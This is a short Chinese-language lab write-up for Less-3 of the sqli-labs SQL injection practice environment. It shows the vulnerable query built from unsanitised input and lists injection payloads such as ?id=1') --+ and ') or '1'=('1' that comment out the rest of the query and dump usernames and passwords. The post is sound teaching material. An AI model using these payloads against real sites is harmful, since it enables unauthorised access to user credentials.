Sqli-labs less 3
2016-08-11 23:05
489 查看
Less-3
我们使用?id='![](https://images2015.cnblogs.com/blog/669054/201608/669054-20160811230521953-839127011.jpg)
注入代码后,我们得到像这样的一个错误:
MySQL server version for the right syntax to use near "") LIMIT 0,1′ at line 1
这里它意味着,开发者使用的查询是:
Select login_name, select password from table where id= ('our input here')
所以我们再用这样的代码来进行注入:
?id=1′) –-+
![](https://images2015.cnblogs.com/blog/669054/201608/669054-20160811230524046-1838655937.jpg)
这样一来,我们便可以得到用户名和密码了,同时后面查询也已经被注释掉了。
在源代码中的SQL查询语句,31行:
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
可以成功注入的有:
') or '1'=('1'
) or 1=1 --+
其余的payload与less1中一直,只需要将less1中的 ' 添加) 即')
相关文章推荐
- Sqli-labs less 55
- Sqli-labs less 39
- Sqli-labs less 4
- sqli-labs Less(1-35) 小结
- SQLi-LABS-Page-2-(Adv-Injections)less-23-38注入教程
- Sqli-labs less 54
- Sqli-labs less 2
- Sqli-labs less 38
- Sqli-labs less 26a
- 通过sqli-labs学习sql注入——进阶挑战之less23-28a
- SQLi-Labs 学习笔记(Less 51-65)
- Sqli-labs less 37
- Sqli-labs less 15
- 【SQL注入之sqli-labs】Less 1 - Less 5 练习笔记
- 【SQL注入之sqli-labs】Less 6 - Less 10 练习笔记
- SQLi-Labs 学习笔记(Less 31-40)
- SQLi-Labs 学习笔记(Less 1-10)
- Sqli-labs less 35
- Sqli-labs less 16
- SQLi-Labs 练习总结 Page-1 Less-1